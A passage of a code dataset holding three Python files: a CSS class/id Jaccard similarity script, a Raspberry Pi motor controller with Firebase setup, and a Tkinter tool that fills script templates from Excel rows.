logging.getLogger(__name__)\nlogging.basicConfig()\nlogger.setLevel(logging.DEBUG)\n\ndef load_all_files(directory):\n logger.debug('load_all_files: {}'.format(directory))\n\n extractions = {}\n walker = os.walk(directory)\n i = 0\n for w in walker:\n for x in w[2]:\n if not x.endswith('.html'):\n continue\n\n else:\n fn = os.path.join(w[0], x)\n\n with open(fn) as f:\n src = f.read()\n soup = BeautifulSoup(src)\n extractions[x] = extract_classes_ids(soup)\n\n if i % 100 == 0:\n logger.debug('{}: {}'.format(i, fn))\n\n i += 1\n\n return extractions\n\ndef compare_all(extractions):\n keys = extractions.keys()\n results = open('simscores.csv', 'w')\n for i in range(len(keys)):\n for j in range(i+1, len(keys)):\n fn_i = keys[i]\n fn_j = keys[j]\n\n classes_i, ids_i = extractions[fn_i]\n classes_j, ids_j = extractions[fn_j]\n\n j_c = jaccard(classes_i, classes_j)\n j_i = jaccard(ids_i, ids_j)\n\n results.write('{},{},{},{}\\n'.format(fn_i, fn_j, j_c, j_i))\n\ndef compare_files(args):\n with open(args.files[1]) as f1, open(args.files[1]) as f2:\n src1 = f1.read()\n src2 = f2.read()\n\n cj = ClassJaccarder(src1)\n similarity = cj.compare(src2)\n\n logger.debug(similarity)\n\nparser = argparse.ArgumentParser(prog='Compute Jaccard similarities between\\\nthe CSS classes and ids between two HTML documents')\n\nparser.add_argument('--files', '-f', nargs=2,\n help='Path to 2 
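The jaccard helper imported by compute-css-similarity.py is not part of this file; the standard set-based definition it presumably implements is sketched below.

# Standard Jaccard similarity on sets; assumed equivalent to simscores.jaccard.
def jaccard(a, b):
    a, b = set(a), set(b)
    if not a and not b:
        return 1.0  # convention: two empty sets are identical
    return len(a & b) / len(a | b)

print(jaccard({'nav', 'btn'}, {'btn', 'hero', 'nav'}))  # -> 0.666...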
files that contain HTML source')\n\nparser.add_argument('--directory', '-d', nargs=1,\n help='Directory to recursively parse for files, and to \\\n compute pairwise similarities between.')\nargs = parser.parse_args()\n\nif args.files:\n compare_files(args)\nelif args.directory:\n extractions = load_all_files(args.directory[0])\n compare_all(extractions)\n","repo_name":"giantoak/north-american-tyrion","sub_path":"compute-css-similarity.py","file_name":"compute-css-similarity.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} {"seq_id":"24704972007","text":"# object oriented MAIN CODE\n\nimport RPi.GPIO as GPIO \nfrom time import sleep\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n# firebase modules\nimport os\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom google.cloud import firestore\nfrom firebase_admin import firestore\nimport threading\n\n# firebase initialize\ncred = credentials.Certificate(\"serviceAccountKey.json\")\nfirebase_admin.initialize_app(cred)\ndb = firestore.client()\n\n# creating an event for notifying the main thread\ncallback_done = threading.Event()\n\n\nleftStatus=False\nrightStatus=False\n\n# capturing changes in the database\n\n\n# def on_snapshot(doc_snap,changes,read_time):\n# print(doc_snap)\n# for doc in doc_snap:\n# docDict = doc.to_dict()\n# print(docDict['leftmotor'])\n# if(docDict['leftmotor']==\"Lmotor\"):\n# print(docDict)\n# leftMotorStatus=docDict['leftMotorStatus']\n# global leftStatus\n# leftStatus=leftMotorStatus\n# elif(docDict['rightMotor']==\"Rmotor\"):\n# RightMotorStatus=docDict['rightMotorStatus']\n# global rightStatus\n# rightStatus=RightMotorStatus\n# callback_done.set()\n\n\n# doc_ref_LeftMotor = db.collection('PropellerMotor').document('LeftMotor')\n# doc_ref_RightMotor = db.collection('PropellerMotor').document('RightMotor')\n\n# # watch the document\n# doc_watch1 = doc_ref_LeftMotor.on_snapshot(on_snapshot)\n# doc_watch2 = doc_ref_RightMotor.on_snapshot(on_snapshot)\n\n# \nclass Motor():\n def __init__(self,Ena,In1,In2):\n self.Ena = Ena\n self.In1= In1\n self.In2 = In2\n\n GPIO.setup(self.Ena,GPIO.OUT)\n GPIO.setup(self.In1,GPIO.OUT)\n GPIO.setup(self.In2,GPIO.OUT)\n self.pwm = GPIO.PWM(self.Ena,100)\n self.pwm.start(0)\n \n\n def moveForwardSpeed(self,x=50,t=0):\n GPIO.output(self.In1,GPIO.LOW)\n GPIO.output(self.In2,GPIO.HIGH)\n self.pwm.ChangeDutyCycle(x)\n sleep(t)\n\n def moveBackward(self,x=50,t=0):\n GPIO.output(self.In1,GPIO.HIGH)\n GPIO.output(self.In2,GPIO.LOW)\n self.pwm.ChangeDutyCycle(x)\n sleep(t)\n","repo_name":"chetryJyoti/sih-pi-codes","sub_path":"mainProgram/guidingArmsManual.py","file_name":"guidingArmsManual.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"26127172169","text":"#!/usr/bin/env python3\nfrom string import Template\n\nimport pandas as pd\nimport os, sys, re\nimport tkinter as tk\nfrom tkinter import filedialog, E, W, LEFT\n\nimport json\nimport datetime\nfrom myfunc import ls_name, get_filename, get_file_name_ext , Timer\nimport time\nt = Timer()\n\n\nversion = \"V06_20052029\"\n#version = \"V04_20052023\": support package profile, create scripts from many templates at the same time, create package profile\n#version = \"V05_20052028\": add merge folder button, recursively merge all sub folders\n#version = \"V06_20052029\": beautiful printout in terminal, status, GUI printout, friendly 
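A usage sketch for the Motor class defined above; the BCM pin numbers here are hypothetical and must match the actual wiring.

# Hypothetical wiring: ENA on BCM 25, IN1 on BCM 23, IN2 on BCM 24.
left = Motor(Ena=25, In1=23, In2=24)
left.moveForwardSpeed(60, 2)  # run forward at 60% duty cycle for 2 s
left.moveBackward(40, 1)      # run backward at 40% duty cycle for 1 s
left.pwm.ChangeDutyCycle(0)   # let the motor coast
GPIO.cleanup()                # release the GPIO pins when done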
progress update during script running\n\nhome_path = os.path.dirname(os.path.realpath(__file__))\nprint(home_path)\n\n\nclass Timer1:\n\t'''\n\t#example how to use:\n\t#>>> t = Timer1()\n\t#>>> t.start()\n\t#>>> t.stop()\n\t#>>> Elapsed time: 10.0668 seconds [00:00:10]\n\t'''\n\tdef __init__(self):\n\t\tself._start_time = None\n\n\tdef start(self):\n\t\t\"\"\"Start a new timer\"\"\"\n\t\tif self._start_time is not None:\n\t\t\traise TimerError(\"Timer is running. Use .stop() to stop it\")\n\t\t\t\n\n\t\tself._start_time = time.perf_counter()\n\t\t#print(\">>> The action start at:\", get_now())\n\n\tdef stop(self):\n\t\t\"\"\"Stop the timer, and report the elapsed time\"\"\"\n\t\tif self._start_time is None:\n\t\t\traise TimerError(\"Timer is not running. Use .start() to start it\")\n\n\t\telapsed_time = time.perf_counter() - self._start_time\n\t\tseconds = elapsed_time % (24 * 3600) \n\t\thour = seconds // 3600\n\t\tseconds %= 3600\n\t\tminutes = seconds // 60\n\t\tseconds %= 60\n\t\t\n\t\tself._start_time = None\n\t\ttime_string = \"Elapsed time: %0.4f seconds [%02d:%02d:%02d]\" % (elapsed_time,hour, minutes, seconds)\n\t\t#print(\">>> Elapsed time: %0.4f seconds [%02d:%02d:%02d]\" % (elapsed_time,hour, minutes, seconds))\n\t\tprint_to_textbox(time_string)\n\t\ttext_var_status.set(text_var_status.get() + \" \" + time_string)\n\t\t\n#to update GUI\nt1 = Timer1()\n\ndef get_now_stamp():\n\t'''\n\t#>>> get_now_stamp()\n\t#'20200514_094015'\n\t'''\n\treturn datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n\ndef findallexcellsheet(excel_filepath):\n\t'''\n\treturn a list of sheet name\n\t>>> xl = pd.ExcelFile('input_cdd.xlsx')\n\t>>> xl.sheet_names\n\t['Sheet1', 'Sheet2', 'Sheet3']\n\t>>>\n\t'''\n\txl = pd.ExcelFile(excel_filepath)\n\treturn xl.sheet_names\n\n\n\n#find a way to auto-map variables to columns, like MLC\n\ndef browse_datainput_button():\n\tstatus_label.configure(background=orig_color)\n\t\n\tglobal input_file_path\n\t#global root_path\n\t#root_path = filedialog.askdirectory()\n\t#filedialog.askopenfilename(filetypes=[(\"Excel files\", \".xlsx .xls\")])\n\tinput_file_path = filedialog.askopenfilename(filetypes=[(\"Excel files\", \".xlsx .xls\")])\n\t\n\n\tprint(\"button press!!\")\n\tprint(input_file_path)\n\t\n\t#update entry for input path\n\ttext_var_inputpath.set(input_file_path)\n\t\n\tglobal sheet_options_list\n\tsheet_options_list = findallexcellsheet(input_file_path)\n\t#print(sheet_options_list)\n\t\n\t########\n\tglobal om_var\n\tchoices = sheet_options_list\n\tom_var = tk.StringVar(root)\n\t#om_var.set(\"02.Select sheet\")\n\t#sheet_select = tk.OptionMenu(root, om_var, *choices)\n\tglobal sheet_select\n\tsheet_select = tk.OptionMenu(root, om_var, *choices,command=lambda _: sheet_select_command())\n\n\tsheet_select.grid(row=0, column=3, sticky=\"ew\")\n\t########\n\t\n\t\n\t#update button label\n\tinput_filename = get_filename(input_file_path)[:20]\n\tbtn_browse_text.set(input_filename)\n\tbrowse_button.configure(bg = 'green2')\n\ttext_var_status.set(\"SELECTED EXCEL FILE\")\n\tfoldersplit_checkbox.configure(state='normal')\n\t\n\t\n\n\n\ndef browse_template_button():\n\tglobal template_filepath\n\t\n\t#root_path = filedialog.askdirectory()\n\ttemplate_filepath = filedialog.askopenfilename()\n\t\n\tprint(\"button press!!\")\n\tprint(template_filepath)\n\t\n\t\n\t#update entry for input path\n\ttext_var_templatepath.set(template_filepath)\n\t#change color after finished\n\tbrowse_template_button.configure(bg = 'green2')\n\tclear_textbox()\n\twith open(template_filepath) as 
infile:\n\t\tfilecontent = infile.read()\n\t\tprint_to_textbox(filecontent)\n\tentry_templatefilepath.configure(bg=\"green2\")\n\ndef fill_template():\n\n\tcreate_button.configure(bg=\"yellow\")\n\tprint(\"full template button press!!\")\n\ttext_var_status.set(\"RESET\")\n\tglobal input_file_path, template_filepath #these variables are created in browse_button\n\t\n\t#global selected_sheet #use this variable to reuse it in the folder tag function\n\tselected_sheet = om_var.get()\n\tprint(\"selected_sheet:\", selected_sheet)\n\tglobal om_folder_var, filenametag_var\n\t\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tprint(\"SUMMARY DATA INPUT TABLE:\")\n\tprint(df)\n\tglobal column_header\n\tcolumn_headers = list(df.columns.values)\n\tf = open(template_filepath, \"r\")\n\tinput_file_content = f.read()\n\t#global folder_tag\n\tfolder_tag = om_folder_var.get()\n\tf.close()\n\t\n\tfolder, template_filename = os.path.split(template_filepath)\n\t\n\t#####\n\t#find all variable in template\n\twith open(template_filepath) as infile:\n\t\tlines = infile.readlines()\n\t\t\n\t\t#find all variable string\n\t\tvar_set = set()\n\t\tfor index, line in enumerate(lines):\n\t\t\tline = line.strip()\n\t\t\t#the common case uses the $variable form\n\t\t\tregex = '\\$' + \"(\\w+)\"\n\t\t\tvariables = re.findall(regex, line)\n\t\t\t#print(variables)\n\t\t\tfor item in variables:\n\t\t\t\tvar_set.add(item)\n\t\t\t\n\t\t\t#####\n\t\t\tregex2 = '\\$\\{' + \"(\\w+)\"+'\\}'\n\t\t\tvariables2 = re.findall(regex2, line)\n\t\t\tprint(variables2)\n\t\t\tfor item in variables2:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\t\t\n\t\tprint(\"----------------all variable string come to here--------------\")\n\t\tprint(var_set) #{'smtcOffset', 'smtcPeriodicity', 'smtcDuration', 'smtcScs', 'arfcnValueNRDl', 'nRFrequencyId'}\n\t\t\n\t#####\n\t\n\tfor index, row in df.iterrows():\n\t\tdata = {}\n\t\tfor column_name in var_set:\n\t\t\tif column_name in column_headers:\n\t\t\t\t#print(index,column_name,row[column_name])\n\t\t\t\tdata[column_name] = row[column_name]\n\t\tprint(data)\n\t\t#will tune this later\n\t\t#rowname = \"row\"+str(index)\n\t\t\n\t\trowname = filenametag_var.get()\n\t\tsrc = Template(input_file_content)\n\t\tif not data: #EMPTY or no variable\n\t\t\tresult = input_file_content\n\t\telse:\n\t\t\tresult = src.substitute(data)\n\t\thome_path = os.path.dirname(os.path.realpath(__file__))\n\t\t#output_filepath=os.path.join(home_path, \"output_script\", str(rowname))\n\t\t\n\t\t#split the scripts by folder\n\t\ttemplatename, ext = get_file_name_ext(template_filename)\n\t\tprint(\"str(row[rowname]\", str(row[rowname]))\n\t\tif not var_foldersplit.get():\n\t\t\t#output_filepath = os.path.join(home_path, \"output_script\",template_filename + \"_\" + rowname)\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",templatename + \"_\" + str(row[rowname]) + \".\" + ext)\n\t\telse:\n\t\t\t#create the folder if it does not exist\n\t\t\tif not os.path.exists(os.path.join(home_path, \"output_script\",row[folder_tag])):\n\t\t\t\tos.mkdir(os.path.join(home_path, \"output_script\",row[folder_tag]))\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], templatename + \"_\" + str(row[rowname]) + \".\"+ ext)\n\t\t\n\t\tglobal var_mergefile\n\t\tif var_mergefile.get():\n\t\t\toutput_text_file = open(output_filepath, \"a\")\n\t\t\t\n\t\telse :\n\t\t\toutput_text_file = open(output_filepath, 
\"w\")\n\t\toutput_text_file.write(result)\n\t\toutput_text_file.close()\n\t\tprint(\"write successful\", data, \"to\", output_filepath)\n\t\t\n\t\t\n\n\ttext_var_status.set(\"FINISHED!!!\")\n\tcreate_button.configure(bg=\"green2\")\n\tstatus_label.configure(bg=\"green2\")\n\n\ndef folder_option_status_change():\n\tprint(\"option_status_change\")\n\tprint(var_foldersplit.get())\n\tfolder_split_select = var_foldersplit.get()\n\tglobal input_file_path\n\tglobal om_folder_var\n\tselected_sheet = om_var.get()\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tchoices = list(df.columns.values)\n\t#create folder option menu\n\tfolder_select = tk.OptionMenu(root, om_folder_var, *choices)\n\tif var_foldersplit.get():\n\t\ttry:\n\t\t\tfolder_select.grid(row=3, column=3, sticky=\"ew\")\n\t\texcept:\n\t\t\ttext_var_status.set(\"Select Input file first\")\n\tif not var_foldersplit.get():\n\t\tom_folder_var.set(\"\")\n\t\n\tfoldersplit_checkbox.configure(bg=\"green2\")\n\ndef save_profile_press():\n\tglobal template_filepath,input_file_path,var_foldersplit,var_mergefile\n\tselected_sheet = om_var.get()\n\tfolder_tag = om_folder_var.get()\n\tpackage_name = text_var_packagename.get()\n\tprint(\"save_profile_press!!\")\n\t#init a dict\n\tdata = {}\n\tpath,template_filename = os.path.split(template_filepath)\n\tprofile_filename = template_filename + \"_\" + get_now_stamp()+\".json\" ##'20200514_094015'\n\tdata['template_filepath'] = template_filepath\n\tdata['input_file_path'] = input_file_path\n\tdata['selected_sheet'] = selected_sheet\n\tdata['folder_tag'] = folder_tag\n\tdata['foldersplit']=var_foldersplit.get()\n\tdata['filenametag'] = filenametag_var.get()\n\tdata['mergefile'] = var_mergefile.get()\n\t\n\tprint(\"data to be saved as below\")\n\tprint(data)\n\tprofile_filepath = os.path.join(home_path,'profile',profile_filename)\n\t#with open(os.path.join(home_path,'profile',profile_filename), 'w') as outfile:\n\twith open(profile_filepath, 'w') as outfile:\n\t\tjson.dump(data, outfile)\n\t#text_var_status.set(\"Save profile to \"+ profile_filename)\n\t\n\t#####################\n\tdata2 = {}\n\tpath,template_filename = os.path.split(template_filepath)\n\t\n\tpackage_filename = package_name + \".json\"\n\tpackage_filepath = os.path.join(home_path,'profile','profile_package',package_filename)\n\tdata2['package_name'] = package_name\n\t\n\tprint(\"package data to be saved as below\")\n\tprint(data2)\n\t#create a new package file if it does not exist\n\tif not os.path.exists(package_filepath):\n\t\tdata2['profiles_filepath'] = [profile_filepath]\n\t\twith open(package_filepath, 'w') as outfile:\n\t\t\tjson.dump(data2, outfile)\n\telse: #the package file already exists\n\t\twith open(package_filepath) as json_file:\n\t\t\tdata_dict = json.load(json_file)\n\t\t\tprint(data_dict)\n\t\t#profile_package_name = data_dict['package_name']\n\t\tprofiles_filepath = data_dict['profiles_filepath']\n\t\tif profile_filepath not in profiles_filepath:\n\t\t\tprofiles_filepath.append(profile_filepath)\n\t\t\n\t\tdata2['profiles_filepath'] = profiles_filepath\n\t#save new package profile or update it with new data\n\twith open(package_filepath, 'w') as outfile:\n\t\tjson.dump(data2, outfile)\n\ttext_var_status.set(\"Saved profile to: \"+ profile_filename+\" | Saved package to: \"+ get_filename(package_filename))\n\t#####################\n\t\n\t#update option menu profile with new profile\n\tglobal om_profile_var\n\tom_profile_var.set('')\n\tprofile_select['menu'].delete(0, 'end')\n\tprofile_files = 
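fill_template leans on string.Template for the substitution itself; a minimal sketch of that step with illustrative placeholder names (the real names come from the Excel column headers):

from string import Template

# Illustrative row data; in the script the dict is built from one Excel row.
row = {'nRFrequencyId': 'NR01', 'arfcnValueNRDl': 620000}
tpl = Template("create NRFrequency=$nRFrequencyId arfcn=${arfcnValueNRDl}")
print(tpl.substitute(row))      # raises KeyError if a placeholder is missing
print(tpl.safe_substitute({}))  # alternative: leaves unknown placeholders intact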
ls_name(os.path.join(home_path,'profile'))\n\tnew_choices = profile_files\n\tfor choice in new_choices:\n\t\tprofile_select['menu'].add_command(label=choice, command=tk._setit(om_profile_var, choice))\n\ndef clear_textbox():\n\tlog_textbox.delete(\"1.0\",\"end\")\ndef loadprofile():\n\tprint(\"loadprofile press!!!\")\n\tlog_textbox.delete(\"1.0\",\"end\")\n\t#print profile name to text box\n\tprint_to_textbox(\"profile selected:\")\n\tprofile_filename_selected = om_profile_var.get()\n\tprint_to_textbox(profile_filename_selected)\n\t\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\twith open(os.path.join(home_path,\"profile\",profile_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\tprint(data_dict)\n\t\t#print_to_textbox(str(data_dict))\n\t\ttemplate_filepath = data_dict[\"template_filepath\"]\n\t\tinput_file_path = data_dict[\"input_file_path\"]\n\t\tselected_sheet = data_dict[\"selected_sheet\"]\n\t\tfolder_tag = data_dict[\"folder_tag\"]\n\t\tfoldersplit = data_dict['foldersplit']\n\t\tfilenametag = data_dict['filenametag']\n\t\tmergefile = data_dict['mergefile']\n\t\t\n\t\tprint_to_textbox(\"Excel Input: \"+get_filename(input_file_path))\n\t\tprint_to_textbox(\"Sheet Name: \"+selected_sheet)\n\t\tprint_to_textbox(\"Template Input: \"+get_filename(template_filepath))\n\t\tprint_to_textbox(\"Folder_tag: \"+folder_tag)\n\t\tprint_to_textbox(\"foldersplit: \"+str(foldersplit))\n\t\tprint_to_textbox(\"filenametag: \"+str(filenametag))\n\t\tprint_to_textbox(\"mergefile: \"+str(mergefile))\n\t\t\n\t\tprint_to_textbox(\"-------------------------\")\n\t\t\n\t\tinput_filename = get_filename(input_file_path)[:20]\n\t\tbtn_browse_text.set(input_filename)\n\t\tbrowse_button.configure(bg = 'green2')\n\t\n\t################\n\t#selected_sheet = om_var.get()\n\tprint(\"selected_sheet:\", selected_sheet)\n\t\n\t\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tprint(\"SUMMARY DATA INPUT TABLE:\")\n\tprint(df)\n\tglobal column_header\n\tcolumn_headers = list(df.columns.values)\n\t\n\t\n\tf = open(template_filepath, \"r\")\n\tinput_file_content = f.read()\n\t\n\tf.close()\n\t\n\tfolder, template_filename = os.path.split(template_filepath)\n\t\n\t#####\n\t#find all variable in template\n\twith open(template_filepath) as infile:\n\t\tlines = infile.readlines()\n\t\t\n\t\t#find all variable string\n\t\tvar_set = set()\n\t\tfor index, line in enumerate(lines):\n\t\t\tline = line.strip()\n\t\t\tregex = '\\$' + \"(\\w+)\"\n\t\t\tvariables = re.findall(regex, line)\n\t\t\tfor item in variables:\n\t\t\t\tvar_set.add(item)\n\t\t\t\n\t\t\t#####\n\t\t\tregex2 = '\\$\\{' + \"(\\w+)\"+'\\}'\n\t\t\tvariables2 = re.findall(regex2, line)\n\t\t\tprint(variables2)\n\t\t\tfor item in variables2:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\t\t\n\t\tprint(\"----------------all variable string_from load profile--------------\")\n\t\tprint(var_set) #{'smtcOffset', 'smtcPeriodicity', 'smtcDuration', 'smtcScs', 'arfcnValueNRDl', 'nRFrequencyId'}\n\t\t\n\t#####\n\t\n\tfor index, row in df.iterrows():\n\t\tdata = {}\n\t\tfor column_name in var_set:\n\t\t\tif column_name in column_headers:\n\t\t\t\t#print(index,column_name,row[column_name])\n\t\t\t\tdata[column_name] = row[column_name]\n\t\tprint(data)\n\t\t#will turning later\n\t\t#rowname = \"row\"+str(index)\n\t\trowname = filenametag\n\t\t\n\t\tsrc = Template(input_file_content)\n\t\tresult = src.substitute(data)\n\t\t#home_path = 
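The profile menu above is refreshed in place by clearing the underlying Menu widget and re-adding commands with tk._setit, the same private helper OptionMenu uses internally. A generic sketch of that pattern:

# Generic refresh for a tkinter OptionMenu; om is an existing OptionMenu and
# var its StringVar. Note tk._setit is a private tkinter helper.
def refresh_option_menu(om, var, new_choices):
    menu = om['menu']
    menu.delete(0, 'end')  # drop the stale entries
    for choice in new_choices:
        menu.add_command(label=choice, command=tk._setit(var, choice))
    var.set(new_choices[0] if new_choices else '')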
os.path.dirname(os.path.realpath(__file__))\n\t\t#output_filepath=os.path.join(home_path, \"output_script\", str(rowname))\n\t\t\n\t\t#split the scripts by folder\n\t\ttemplatename, ext = get_file_name_ext(template_filename)\n\t\tif not foldersplit:\n\t\t\t#output_filepath = os.path.join(home_path, \"output_script\",template_filename + \"_\" + rowname)\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",templatename + \"_\" + str(row[rowname]) + \".\" + ext)\n\t\telse:\n\t\t\t#create the folder if it does not exist\n\t\t\tif not os.path.exists(os.path.join(home_path, \"output_script\",str(row[folder_tag]))):\n\t\t\t\tos.mkdir(os.path.join(home_path, \"output_script\",row[folder_tag]))\n\t\t\t\n\t\t\t#script naming rule: include the row tag and the template name\n\t\t\t#output_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], template_filename + \"_\" + rowname)\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], templatename + \"_\" + row[rowname] + \".\"+ ext)\n\t\t\n\t\t#if var_mergefile.get():\n\t\tif mergefile:\n\t\t\n\t\t\toutput_text_file = open(output_filepath, \"a\")\n\t\telse :\n\t\t\toutput_text_file = open(output_filepath, \"w\")\n\t\toutput_text_file.write(result)\n\t\toutput_text_file.close()\n\t\tprint(\"write successful\", data, \"to\", output_filepath)\n\n\t\t\n\t\tprint_to_textbox(\"write successful script \"+ output_filepath)\n\t\t\n\n\ttext_var_status.set(\"FINISHED!!!\")\n\t#create_button.configure(bg=\"green2\")\n\tloadprofile_button.configure(bg=\"green2\")\n\tstatus_label.configure(bg=\"green2\")\n\t################\n\ndef print_to_textbox(text_string):\n\t'''this function helps to append a string to the text box'''\n\tlog_textbox.insert(tk.END, text_string + \"\\n\")\n\troot.update_idletasks()\n\ndef show_profile_to_textbox():\n\tprofile_filename_selected = om_profile_var.get()\n\tprint(om_profile_var.get())\n\tprint_to_textbox(om_profile_var.get())\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\tclear_textbox()\n\twith open(os.path.join(home_path,\"profile\",profile_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\tprint(data_dict)\n\t\t\n\t\ttemplate_filepath = data_dict[\"template_filepath\"]\n\t\tinput_file_path = data_dict[\"input_file_path\"]\n\t\tselected_sheet = data_dict[\"selected_sheet\"]\n\t\tfolder_tag = data_dict[\"folder_tag\"]\n\t\tfoldersplit = data_dict['foldersplit']\n\t\tfilenametag = data_dict['filenametag']\n\t\tmergefile = data_dict['mergefile']\n\t\t\n\t\tprint_to_textbox(\"Excel Input: \"+get_filename(input_file_path))\n\t\tprint_to_textbox(\"Sheet Name: \"+selected_sheet)\n\t\tprint_to_textbox(\"Template Input: \"+get_filename(template_filepath))\n\t\tprint_to_textbox(\"Folder_tag: \"+folder_tag)\n\t\tprint_to_textbox(\"foldersplit: \"+str(foldersplit))\n\t\tprint_to_textbox(\"filenametag: \"+str(filenametag))\n\t\tprint_to_textbox(\"mergefile: \"+str(mergefile))\n\t\t\n\t\tprint_to_textbox(\"-------------------------\")\n\tprofile_select.configure(bg=\"green2\")\n\tloadprofile_button.configure(state='normal')\n\ndef filenametag_select_command():\n\tprint(\"filenametag_select_command selected !!\")\n\tfilenametag_select.configure(bg=\"green2\")\n\ndef sheet_select_command():\n\tprint(\"sheet_select_command selected!!!\")\n\tsheet_select.configure(bg=\"green2\")\n\tglobal input_file_path\n\tselected_sheet = om_var.get()\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\t\n\t#create filename tag option 
menu\n\tchoices = list(df.columns.values)\n\tglobal filenametag_select, filenametag_var\n\tfilenametag_var = tk.StringVar(root)\n\tfilenametag_var.set(\"04.FILENAME_TAG\")\n\tfilenametag_select = tk.OptionMenu(root, filenametag_var, *choices,command=lambda _: filenametag_select_command())\n\tfilenametag_select.grid(row=2, column=2, sticky=\"ew\", columnspan=1)\n\t#end create filename tag menu\n\t\n\t####create merge-file checkbox, on the same row as the filename tag\n\tglobal var_mergefile\n\t#var_mergefile = tk.IntVar(value=1)\n\tvar_mergefile = tk.IntVar(value=0)\n\tmergefile = tk.Checkbutton(root, text=\"MERGE FILE\", variable=var_mergefile, command = mergefile_option_status_change)\n\tmergefile.grid(row=2,sticky=\"w\", column=3)\n\t####\n\t#only enable the create button after the excel file is chosen via browse and a sheet is selected\n\tcreate_button.configure(state='normal')\n\ndef mergefile_option_status_change():\n\tprint(\"mergefile_option_status_change ticked !!\")\n\tprint(var_mergefile.get())\n\n\ndef show_profile_package_to_textbox():\n\tprint(\"profile package option menu selected\")\n\tprofile_package_filename_selected = om_profile_package_var.get()\n\tprint(profile_package_filename_selected)\n\tclear_textbox()\n\tprint_to_textbox(\"Profile package selected: \"+profile_package_filename_selected)\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\t\n\twith open(os.path.join(home_path,\"profile\",\"profile_package\",profile_package_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\t#print(data_dict)\n\t\tprofile_package_name = data_dict['package_name']\n\t\tprofiles_filepath = data_dict['profiles_filepath']\n\t\t#print(profile_package_name)\n\t\t#print(profiles_filepath)\n\t\tprint_to_textbox(\"profile_package_name \"+profile_package_name)\n\t\t\n\t\tprint_to_textbox(\"-----------------------------------------\")\n\t\tprint_to_textbox(\"profile_filepaths: \")\n\t\tprint(\"profile_filepaths: \")\n\t\tfor profile_filepath in profiles_filepath:\n\t\t\t#print_to_textbox(profile_filepath)\n\t\t\tprint_to_textbox(get_filename(profile_filepath))\n\t\t\tprint(get_filename(profile_filepath))\n\n\tprofile_package_select.configure(bg=\"green2\")\n\ttext_var_status.set(\"STATUS: PACKAGE SELECTED\")\n\tloadprofile_package_button.configure(state='normal')\n\n\ndef loadprofile_procedure(profile_filepath):\n\tprint(\"---------------------creating script for profile\", profile_filepath, \"--------------------\")\n\tprint_to_textbox(\"---------------------------\")\n\tprint_to_textbox(\"creating script for profile:\" + get_filename(profile_filepath))\n\ttext_var_status.set(\"loading \"+get_filename(profile_filepath))\n\twith open(profile_filepath) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\tprint(data_dict)\n\t\ttemplate_filepath = data_dict[\"template_filepath\"]\n\t\tinput_file_path = data_dict[\"input_file_path\"]\n\t\tselected_sheet = data_dict[\"selected_sheet\"]\n\t\tfolder_tag = data_dict[\"folder_tag\"]\n\t\tfoldersplit = data_dict['foldersplit']\n\t\tfilenametag = data_dict['filenametag']\n\t\tmergefile = data_dict['mergefile']\n\n\t\tinput_filename = get_filename(input_file_path)[:20]\n\t\n\t\n\tprint(\"selected_sheet:\", selected_sheet)\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tprint(\"SUMMARY DATA INPUT TABLE:\")\n\tprint(df)\n\tglobal column_header\n\tcolumn_headers = list(df.columns.values)\n\t\n\t\n\tf = open(template_filepath, \"r\")\n\tinput_file_content = 
f.read()\n\t\n\tf.close()\n\t\n\tfolder, template_filename = os.path.split(template_filepath)\n\t\n\t#find all variable in template\n\twith open(template_filepath) as infile:\n\t\tlines = infile.readlines()\n\t\t\n\t\t#find all variable string\n\t\tvar_set = set()\n\t\tfor index, line in enumerate(lines):\n\t\t\tline = line.strip()\n\t\t\tregex = '\\$' + \"(\\w+)\"\n\t\t\tvariables = re.findall(regex, line)\n\t\t\tfor item in variables:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\t\tregex2 = '\\$\\{' + \"(\\w+)\"+'\\}'\n\t\t\tvariables2 = re.findall(regex2, line)\n\t\t\t#print(variables2)\n\t\t\tfor item in variables2:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\tprint(\"variables in \", template_filename)\n\t\tprint(var_set)\n\t\n\t\n\t\n\n\t#substitute data from each row of excel into to template\n\tfor index, row in df.iterrows():\n\t\tdata = {}\n\t\tfor column_name in var_set:\n\t\t\tif column_name in column_headers:\n\t\t\t\t#print(index,column_name,row[column_name])\n\t\t\t\tdata[column_name] = row[column_name]\n\t\t#print(data)\n\t\trowname = filenametag\n\t\t\n\t\tsrc = Template(input_file_content)\n\t\tresult = src.substitute(data)\n\n\t\t#split the scripts by folder\n\t\ttemplatename, ext = get_file_name_ext(template_filename)\n\t\tif not foldersplit:\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",templatename + \"_\" + str(row[rowname]) + \".\" + ext)\n\t\telse:\n\t\t\t#create the folder if it does not exist\n\t\t\tif not os.path.exists(os.path.join(home_path, \"output_script\",str(row[folder_tag]))):\n\t\t\t\tos.mkdir(os.path.join(home_path, 